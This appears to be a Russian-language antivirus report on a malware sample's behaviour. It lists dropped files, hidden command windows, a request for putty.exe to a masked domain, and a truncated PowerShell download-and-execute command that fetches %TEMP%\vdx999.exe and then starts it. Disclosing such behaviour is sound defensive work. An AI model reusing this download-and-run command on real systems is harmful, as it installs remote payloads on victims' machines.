Техническая информация
Вредоносные функции
Загружает и запускает на исполнение
- $str1 как %temp%\vdx999.exe
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c powershell "'powershell ""<#sub main1#>function ftest([string] $str1){(new-object system.net.webclient).downloadfile($str1,''%TEMP%\vdx999.exe'');<#ascii data#>start-process ''%TEMP%\vdx999....
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\vdx888.bat
Сетевая активность
TCP
Запросы HTTP GET
- http://24####patch.co.uk/putty.exe
UDP
- DNS ASK 24####patch.co.uk
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c powershell "'powershell ""<#sub main1#>function ftest([string] $str1){(new-object system.net.webclient).downloadfile($str1,''%TEMP%\vdx999.exe'');<#ascii data#>start-process ''%TEMP%\vdx999....' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\vdx888.bat" "' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\vdx888.bat" "
